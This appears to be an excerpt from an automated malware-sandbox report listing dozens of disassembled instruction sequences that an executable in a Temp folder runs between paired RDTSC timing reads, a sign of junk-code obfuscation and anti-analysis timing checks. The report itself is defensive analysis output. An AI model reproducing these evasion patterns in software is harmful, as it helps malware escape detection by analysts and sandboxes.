                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC8899 second address: AC88D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F73D4C57615h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F73D4C57613h 0x00000013 jno 00007F73D4C57608h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC88D6 second address: AC88DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC7AE6 second address: AC7AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC7C2E second address: AC7C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F73D4D0E046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC7C3A second address: AC7C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F73D4C57606h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC7D91 second address: AC7D96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC7D96 second address: AC7DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F73D4C57606h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F73D4C5760Dh 0x00000011 popad 0x00000012 push edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jno 00007F73D4C57606h 0x0000001b pop edi 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pushad 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC7DC2 second address: AC7DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC8054 second address: AC8078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F73D4C57606h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d jmp 00007F73D4C57617h 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC8078 second address: AC807E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC807E second address: AC8084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC8084 second address: AC809D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f je 00007F73D4D0E04Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC81EB second address: AC820A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F73D4C57618h 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: AC820A second address: AC820F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: ACD06B second address: ACD0B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F73D4C57612h 0x0000000c popad 0x0000000d push eax 0x0000000e jng 00007F73D4C57612h 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D1C91h], esi 0x0000001b push dword ptr [ebp+122D1D49h] 0x00000021 movzx edx, si 0x00000024 push 0D8ADDA5h 0x00000029 push edi 0x0000002a pushad 0x0000002b jc 00007F73D4C57606h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: ACFD32 second address: ACFD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD0133 second address: 4BD0176 instructions: 0x00000000 rdtsc 0x00000002 mov di, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx ecx, dx 0x0000000f pushfd 0x00000010 jmp 00007F73D4C57613h 0x00000015 sbb si, BADEh 0x0000001a jmp 00007F73D4C57619h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD0176 second address: 4BD0186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Ch 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD0186 second address: 4BD018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD018A second address: 4BD01B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F73D4D0E057h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD01B2 second address: 4BD01B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD01B6 second address: 4BD01BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD01BC second address: 4BD01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0ECD second address: 4BB0EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Bh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0EDC second address: 4BB0EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0EE0 second address: 4BB0F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F73D4D0E055h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bx, si 0x00000014 pushfd 0x00000015 jmp 00007F73D4D0E058h 0x0000001a sub ecx, 62BC3378h 0x00000020 jmp 00007F73D4D0E04Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov edx, 4A77E566h 0x00000030 mov esi, ebx 0x00000032 popad 0x00000033 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0F3C second address: 4BB0F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C00069 second address: 4C0006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C0006D second address: 4C00071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C00071 second address: 4C00077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C00077 second address: 4C000A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F73D4C57618h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C000A0 second address: 4C000A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C000A6 second address: 4C000AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4C000AC second address: 4C000B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90130 second address: 4B90137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90137 second address: 4B90166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F73D4D0E04Eh 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F73D4D0E050h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90166 second address: 4B9016C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90205 second address: 4B9020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B9020B second address: 4B90211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90211 second address: 4B90215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4B90215 second address: 4B90219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0CCC second address: 4BB0CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0CD0 second address: 4BB0CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0CE3 second address: 4BB0CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E054h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0CFB second address: 4BB0CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0785 second address: 4BB0794 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0794 second address: 4BB084D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C5760Fh 0x00000009 add al, FFFFFFDEh 0x0000000c jmp 00007F73D4C57619h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F73D4C57610h 0x00000018 adc ecx, 7AC15BD8h 0x0000001e jmp 00007F73D4C5760Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F73D4C57616h 0x0000002d push eax 0x0000002e jmp 00007F73D4C5760Bh 0x00000033 xchg eax, ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007F73D4C5760Bh 0x0000003c pop eax 0x0000003d pushfd 0x0000003e jmp 00007F73D4C57619h 0x00000043 sbb ah, FFFFFF86h 0x00000046 jmp 00007F73D4C57611h 0x0000004b popfd 0x0000004c popad 0x0000004d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB084D second address: 4BB0879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d pushfd 0x0000000e jmp 00007F73D4D0E04Ch 0x00000013 adc si, A558h 0x00000018 jmp 00007F73D4D0E04Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB06A1 second address: 4BB06D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F73D4C57611h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB06D2 second address: 4BB06FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F73D4D0E059h 0x0000000a jmp 00007F73D4D0E04Bh 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB0409 second address: 4BB040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB040D second address: 4BB042A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BB042A second address: 4BB0430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BC01E2 second address: 4BC023F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F73D4D0E04Bh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F73D4D0E056h 0x00000015 mov ebp, esp 0x00000017 jmp 00007F73D4D0E050h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F73D4D0E057h 0x00000024 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0F2C second address: 4BF0F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0F30 second address: 4BF0F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0F36 second address: 4BF0F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD001D second address: 4BD0032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E051h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD02D9 second address: 4BD033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F73D4C57610h 0x0000000f push eax 0x00000010 pushad 0x00000011 call 00007F73D4C57611h 0x00000016 pop edx 0x00000017 mov ecx, 65ACF7F3h 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F73D4C57616h 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BD033B second address: 4BD0358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF06E7 second address: 4BF06FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57614h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF06FF second address: 4BF0715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F73D4D0E04Ah 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0715 second address: 4BF0799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F73D4C57611h 0x00000009 sbb si, 7716h 0x0000000e jmp 00007F73D4C57611h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F73D4C57610h 0x0000001a and al, 00000038h 0x0000001d jmp 00007F73D4C5760Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F73D4C5760Bh 0x00000030 sbb eax, 4DA2F8FEh 0x00000036 jmp 00007F73D4C57619h 0x0000003b popfd 0x0000003c mov si, E147h 0x00000040 popad 0x00000041 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0799 second address: 4BF079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF079F second address: 4BF07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF07A3 second address: 4BF07F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F73D4D0E059h 0x00000011 xchg eax, ecx 0x00000012 jmp 00007F73D4D0E04Eh 0x00000017 mov eax, dword ptr [774365FCh] 0x0000001c pushad 0x0000001d mov bh, al 0x0000001f mov si, bx 0x00000022 popad 0x00000023 test eax, eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 mov dx, 5C64h 0x0000002c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF07F6 second address: 4BF087E instructions: 0x00000000 rdtsc 0x00000002 mov bx, DAD0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F73D4C57619h 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 je 00007F744741A751h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F73D4C57619h 0x0000001e or ecx, 4F52B0B6h 0x00000024 jmp 00007F73D4C57611h 0x00000029 popfd 0x0000002a mov edi, ecx 0x0000002c popad 0x0000002d mov ecx, eax 0x0000002f jmp 00007F73D4C5760Ah 0x00000034 xor eax, dword ptr [ebp+08h] 0x00000037 jmp 00007F73D4C57611h 0x0000003c and ecx, 1Fh 0x0000003f pushad 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF087E second address: 4BF08D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F73D4D0E058h 0x0000000a sub cx, 9D68h 0x0000000f jmp 00007F73D4D0E04Bh 0x00000014 popfd 0x00000015 popad 0x00000016 movzx eax, dx 0x00000019 popad 0x0000001a ror eax, cl 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F73D4D0E04Ch 0x00000025 xor esi, 4ACAEFC8h 0x0000002b jmp 00007F73D4D0E04Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 pop edx 0x00000033 popad 0x00000034 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF08D8 second address: 4BF08DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF08DD second address: 4BF08F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, E84Bh 0x00000012 movzx ecx, di 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF08F3 second address: 4BF0910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4C57619h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0910 second address: 4BF0914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0914 second address: 4BF096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00822014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F73D9067F55h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 jmp 00007F73D4C57613h 0x0000002b mov cx, EBEFh 0x0000002f popad 0x00000030 pop eax 0x00000031 pushad 0x00000032 call 00007F73D4C57610h 0x00000037 jmp 00007F73D4C57612h 0x0000003c pop eax 0x0000003d mov cx, bx 0x00000040 popad 0x00000041 ret 0x00000042 nop 0x00000043 push eax 0x00000044 call 00007F73D9067F93h 0x00000049 mov edi, edi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF096C second address: 4BF0970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exeRDTSC instruction interceptor: First address: 4BF0970 second address: 4BF0986 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57612h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
